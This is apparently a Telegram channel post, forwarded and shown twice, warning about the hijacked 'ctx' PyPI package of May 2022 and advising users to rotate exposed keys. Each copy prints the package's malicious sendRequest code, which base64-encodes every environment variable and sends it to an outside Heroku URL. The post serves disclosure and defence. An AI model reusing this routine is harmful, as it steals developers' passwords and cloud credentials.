The CTX Malicious package 📦

ctx is a malicious package. Versions 0.2.2 and 0.2.6 were released with malicious code that sends AWS tokens to a URL, version 0.1.2 was also republished to Pypi with the malicious code included. In addition all other versions of the library were removed from Pypi. Pypi have since removed all versions of this library from the registry.
The ctx hosted project on PyPI was taken over via user account compromise and replaced with a malicious project which contained runtime code which collected the content of os.environ.items() when instantiating Ctx objects. The captured environment variables were sent as a base64 encoded query parameter to a heroku application running at https://anti-theft-web.herokuapp.com.
If you installed this package between 2022-05-14T19:18:36Z and 2022-05-24T10:07:17Z and your environment variables contain sensitive data like passwords and API keys (like AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY), I advise you rotate your passwords and keys, then perform an audit to determine if they were exploited cuz dude they might be.

The code is like this 👀

def init(self): self.sendRequest() . . # code that performs dict access . # please DO NOT RUN THIS CODE

! def sendRequest(self): string = "" for _, value in environ.items(): string += value+" " message_bytes = string.encode('ascii') base64_bytes = base64.b64encode(message_bytes) base64_message = base64_bytes.decode('ascii') response = requests.get("https://anti-theft-web.herokuapp.com/hacked/"+base64_message)

This code will leak every data on your machine or data base to the attacker , so yeah before you code garbage 🗑do some research

Vanurabilities/coding/hacking:
@V3rtualfreenet

Hýpěrium_haçks

Forwarded from 👻V3řtual_freeňet👻 (★Qůintōn V3řtuål【Kʀɪsᴘɪᴇs™】)

The CTX Malicious package 📦

ctx is a malicious package. Versions 0.2.2 and 0.2.6 were released with malicious code that sends AWS tokens to a URL, version 0.1.2 was also republished to Pypi with the malicious code included. In addition all other versions of the library were removed from Pypi. Pypi have since removed all versions of this library from the registry.
The ctx hosted project on PyPI was taken over via user account compromise and replaced with a malicious project which contained runtime code which collected the content of os.environ.items() when instantiating Ctx objects. The captured environment variables were sent as a base64 encoded query parameter to a heroku application running at https://anti-theft-web.herokuapp.com.
If you installed this package between 2022-05-14T19:18:36Z and 2022-05-24T10:07:17Z and your environment variables contain sensitive data like passwords and API keys (like AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY), I advise you rotate your passwords and keys, then perform an audit to determine if they were exploited cuz dude they might be.

The code is like this 👀

def init(self): self.sendRequest() . . # code that performs dict access . # please DO NOT RUN THIS CODE

! def sendRequest(self): string = "" for _, value in environ.items(): string += value+" " message_bytes = string.encode('ascii') base64_bytes = base64.b64encode(message_bytes) base64_message = base64_bytes.decode('ascii') response = requests.get("https://anti-theft-web.herokuapp.com/hacked/"+base64_message)

This code will leak every data on your machine or data base to the attacker , so yeah before you code garbage 🗑do some research

Vanurabilities/coding/hacking:
@V3rtualfreenet

hottg.com/Hyperiumhacks/226

55 viewsMay 28, 2022 at 06:57